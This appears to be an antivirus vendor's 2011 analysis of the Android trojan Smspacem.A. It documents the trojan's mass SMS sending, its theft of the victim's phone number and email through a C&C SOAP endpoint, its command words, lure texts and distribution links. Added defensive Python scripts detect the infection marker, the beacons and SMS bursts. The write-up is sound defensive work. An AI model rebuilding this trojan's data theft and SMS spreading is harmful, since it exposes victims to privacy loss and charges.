
Android/Smspacem.A!tr - Released May 26, 2011 - Last Updated May 27, 2011

Alias/es

Android.Smspacem (Symantec)

Detection Availability

                Active Database    Extended Database
FortiGate       low                high
FortiClient
FortiMail       N/A

Visible Symptoms

  • A new wallpaper appears on the phone with the picture of Stephen Colbert
  • The phone sends SMS messages to all contacts

Detailed Analysis

Android/Smspacem.A!tr targets mobile phones running Android 2.1 or greater. It trojanizes a legitimate but controversial application called the Holy F***ing Bible. When the phone is infected with Android/Smspacem.A!tr, the application remains functional, but in the background the malware runs its malicious tasks, which consist of:
  • sending SMS messages with anti-Christian/joke texts to all your contacts
  • sending your email address and phone number to a remote web site
  • contacting a Command & Control center every 33 minutes
  • subscribing you to a mailing list/feed related to the Colbert Report
All those tasks are done without the user's consent. Depending on the user's subscription, this may result in financial loss, as the victim may be charged for sending SMS messages and connecting to the Internet.

Technical Details

The malware is usually packaged as holycolbert10.apk (of course, it may propagate under other names). The malicious classes are located in a package named com.YahwehOrNoWay, which is separate from the "legitimate" classes of the Holy F* Bible application.
The malware consists of a service named 'theword'. At startup, it retrieves the device's phone number and operator name. Then it schedules all its tasks to run after an initial delay of 1 minute and every 33 minutes thereafter.
Every 33 minutes, the service gets the current date and formats it as MMddyyyy. It tries to open the database
/data/data/com.AmazingBullshit.HolyFuckingBible/databases/mydb.db
and checks whether the last entry in the myTable table of that database is 'endoftheworld'. This database acts as the infection marker for the device. If it is not present, the malware creates the database, creates the myTable table and inserts the value.
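The infection marker described above can be verified offline on a copy of the database pulled from a device. The following script is an added example (not Fortinet's code and not part of the malware): it opens the database read-only and reports whether the last row of myTable holds 'endoftheworld'. Since the page does not name the table's column, every column of the last row is checked; the fixture builder that mimics the marker is constructed for the demo and its column name is an assumption.

```python
import os
import sqlite3
import tempfile

# On-device path given on the page; the demo works on a local copy instead.
MARKER_DB_PATH = "/data/data/com.AmazingBullshit.HolyFuckingBible/databases/mydb.db"
MARKER_TABLE = "myTable"
MARKER_VALUE = "endoftheworld"


def has_smspacem_marker(db_path):
    """Return True if the last row (by rowid) of myTable contains 'endoftheworld'.

    The column name is not documented on the page, so all columns of the last
    row are compared. A missing file, unreadable file or missing table counts
    as 'no marker'.
    """
    if not os.path.isfile(db_path):
        return False
    uri = "file:%s?mode=ro" % db_path  # read-only: never modify evidence
    try:
        conn = sqlite3.connect(uri, uri=True)
    except sqlite3.Error:
        return False
    try:
        exists = conn.execute(
            "SELECT name FROM sqlite_master WHERE type='table' AND name=?",
            (MARKER_TABLE,),
        ).fetchone()
        if exists is None:
            return False
        row = conn.execute(
            "SELECT * FROM %s ORDER BY rowid DESC LIMIT 1" % MARKER_TABLE
        ).fetchone()
        return row is not None and MARKER_VALUE in [str(v) for v in row]
    except sqlite3.Error:
        return False
    finally:
        conn.close()


def build_sample_db(path, infected):
    """Constructed fixture mimicking the marker database (column name assumed)."""
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE IF NOT EXISTS myTable (value TEXT)")
    if infected:
        conn.execute("INSERT INTO myTable (value) VALUES (?)", (MARKER_VALUE,))
    conn.commit()
    conn.close()


def demo():
    """Build one infected and one clean fixture and check both."""
    tmp = tempfile.mkdtemp()
    infected_db = os.path.join(tmp, "mydb.db")
    clean_db = os.path.join(tmp, "clean.db")
    build_sample_db(infected_db, infected=True)
    build_sample_db(clean_db, infected=False)
    return has_smspacem_marker(infected_db), has_smspacem_marker(clean_db)


if __name__ == "__main__":
    print(demo())  # (True, False)
```

On a real device copy, point has_smspacem_marker at the pulled mydb.db; the read-only URI keeps the evidence file untouched.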

The malware initializes a SOAP request to a malicious C&C center:
http://[REMOVED].no-ip.biz/talktome.asmx
The SOAP object consists of two properties:
  1. cell: this property contains the phone number of the victim
  2. opname: this property contains the operator's name
It uses the namespace http://tempuri.org (not malicious in itself) and invokes the web service method "openmic". As the C&C is now down, we do not know exactly what this web service was meant to do. Apparently, the SOAP object is serialized and sent over HTTP, and the web service is meant to answer with one of a few commands such as "formula401" or "pacem".
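For analysts working from a network capture, the check-in above can be recognised and the exfiltrated fields pulled out of the SOAP body. The code below is an added example (not Fortinet's code): it matches the /talktome.asmx path, the http://tempuri.org namespace and the openmic method named on the page, and returns the cell and opname values. The exact envelope layout the malware produced is not on the page, so the sample request is constructed (standard SOAP 1.1 envelope, placeholder host) and is an assumption.

```python
import xml.etree.ElementTree as ET

SOAP_ENV_NS = "http://schemas.xmlsoap.org/soap/envelope/"
CNC_PATH = "/talktome.asmx"               # endpoint named on the page
CNC_NAMESPACE = "http://tempuri.org"      # namespace named on the page
CNC_METHOD = "openmic"                    # web service method named on the page
KNOWN_COMMANDS = ("formula401", "pacem")  # replies named on the page


def _split_tag(tag):
    """Split an ElementTree tag '{ns}local' into (ns without trailing '/', local)."""
    if tag.startswith("{"):
        ns, local = tag[1:].split("}", 1)
        return ns.rstrip("/"), local
    return "", tag


def parse_beacon(http_request):
    """Return {'cell': ..., 'opname': ...} for a Smspacem check-in, else None.

    http_request is the raw request text: request line, headers, blank line, body.
    """
    head, sep, body = http_request.partition("\r\n\r\n")
    if not sep:
        return None
    request_line = head.split("\r\n", 1)[0].split()
    if len(request_line) < 2 or not request_line[1].endswith(CNC_PATH):
        return None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    body_el = root.find("{%s}Body" % SOAP_ENV_NS)
    if body_el is None:
        return None
    for call in body_el:
        ns, local = _split_tag(call.tag)
        if ns == CNC_NAMESPACE and local == CNC_METHOD:
            fields = {"cell": "", "opname": ""}
            for child in call:
                _, name = _split_tag(child.tag)
                if name in fields:
                    fields[name] = (child.text or "").strip()
            return fields
    return None


def find_commands(response_text):
    """Commands from the page's list that appear in a captured C&C reply body."""
    return {c for c in KNOWN_COMMANDS if c in response_text}


# Constructed sample capture; the host is a placeholder, not the real C&C.
SAMPLE_BEACON = (
    "POST /talktome.asmx HTTP/1.1\r\n"
    "Host: cnc-placeholder.no-ip.biz\r\n"
    "Content-Type: text/xml; charset=utf-8\r\n"
    'SOAPAction: "http://tempuri.org/openmic"\r\n'
    "\r\n"
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soap:Body><openmic xmlns="http://tempuri.org/">'
    "<cell>+15555550100</cell><opname>ExampleCarrier</opname>"
    "</openmic></soap:Body></soap:Envelope>"
)

SAMPLE_BENIGN = "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"

if __name__ == "__main__":
    print(parse_beacon(SAMPLE_BEACON))   # {'cell': '+15555550100', 'opname': 'ExampleCarrier'}
    print(parse_beacon(SAMPLE_BENIGN))   # None
```

The namespace comparison strips a trailing slash so that both http://tempuri.org and the http://tempuri.org/ form emitted by typical ASP.NET web services match.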
If the device's date is May 21, 2011, the malware sends an SMS to all contacts with a text randomly chosen among:
Cannot talk right now, the world is about to end
Jebus is way over due for a come back
Its the Raptures,praise Jebus
Prepare to meet thy maker,make sure to hedge your bet just in case the Muslims’ were right
Just saw the four horsemen of the apocalypse and man did they have the worst case of road rage
Es el fin del mundo
It also changes the wallpaper to an image of Stephen Colbert.
If the device's date is May 22, 2011, the malware sends another SMS to all contacts with the text "Looks like Jebus is a no show, maybe Judaism was on to something".
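The date-triggered behaviour above is a burst of SMS messages to every contact, which is detectable from an outbound SMS log independently of the trigger. The script below is an added example (not Fortinet's code): it counts distinct recipients inside a sliding five-minute window and also counts messages whose text matches the strings listed on the page. The log format (ISO timestamp, recipient, text, tab-separated) and the sample records are constructed for the demo.

```python
import itertools
from collections import Counter
from datetime import datetime, timedelta

# Message texts listed on the page for the May 21 trigger (subset used for matching).
KNOWN_LURES = {
    "Cannot talk right now, the world is about to end",
    "Jebus is way over due for a come back",
    "Its the Raptures,praise Jebus",
    "Es el fin del mundo",
}


def parse_sms_log(lines):
    """Parse constructed lines '<ISO time>\\t<recipient>\\t<text>' into sorted tuples."""
    records = []
    for line in lines:
        ts, recipient, text = line.rstrip("\n").split("\t", 2)
        records.append((datetime.fromisoformat(ts), recipient, text))
    records.sort(key=lambda r: r[0])
    return records


def max_distinct_recipients(records, window=timedelta(minutes=5)):
    """Largest number of distinct recipients messaged within any single window."""
    best = 0
    counts = Counter()
    left = 0
    for right, (ts, recipient, _) in enumerate(records):
        counts[recipient] += 1
        # Drop records that fell out of the window ending at 'ts'.
        while ts - records[left][0] > window:
            old = records[left][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            left += 1
        best = max(best, len(counts))
    return best


def assess(records, window=timedelta(minutes=5), min_recipients=10):
    """Summarise a log: burst size, lure-text matches and a mass-SMS verdict."""
    distinct = max_distinct_recipients(records, window)
    lures = sum(1 for _, _, text in records if text in KNOWN_LURES)
    return {
        "max_distinct_recipients": distinct,
        "lure_matches": lures,
        "mass_sms": distinct >= min_recipients,
    }


# Constructed sample: two ordinary messages, then 12 lure texts in 22 seconds.
SAMPLE_SMS_LOG = [
    "2011-05-21T08:15:00\t+15555550001\tRunning late, see you at 9",
    "2011-05-21T11:40:10\t+15555550002\tok",
] + [
    "2011-05-21T12:00:%02d\t+1555555%04d\t%s" % (i * 2, 100 + i, lure)
    for i, lure in zip(range(12), itertools.cycle(sorted(KNOWN_LURES)))
]

if __name__ == "__main__":
    print(assess(parse_sms_log(SAMPLE_SMS_LOG)))
    # {'max_distinct_recipients': 12, 'lure_matches': 12, 'mass_sms': True}
```

The threshold of ten distinct recipients in five minutes is a tuning choice; the text matching is secondary, since the same burst pattern covers the May 22 message and the link-spreading "formula401" variant as well.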
If the command "formula401" is sent by the web service, the malware sends SMS messages to all contacts with one of the following links:
http://turbobit.net/3qijra41byed.html
http://turbobit.net/9fzlltk2eptu.html
http://turbobit.net/9c19sk0tcg8z.html
Those links are no longer active. It also changes the wallpaper to an image named hammer.jpg.
If the command "pacem" is sent by the web service, the malware submits the victim's email address to the following link:
http://[REMOVED]central.com/global/feeds/entertainment/media/submit_entry.jhtml?collectionID=96&email=EMAIL&format=json&jsoncallback=?

Another malicious class, named SMSsmack.class, implements a message receiver. If the infected device receives an SMS message containing the body "health", it replies to the sender with an SMS whose text is randomly chosen among:
Cannot talk right now, the world is about to end
Jebus is way over due for a come back
Its the Raptures,praise Jebus
Prepare to meet thy maker, make sure to hedge your bet just in case the Muslims were right
Just saw the four horsemen of the apocalypse and man did they have the worst case of road rage
Es el fin del mundo
I am infected and alive ver 1.00
This functionality is probably used by the attacker to test whether a given device is still properly infected.

Recommended Action

    FortiGate Systems

  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.

    FortiClient Systems

  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Reference: ID - 2750080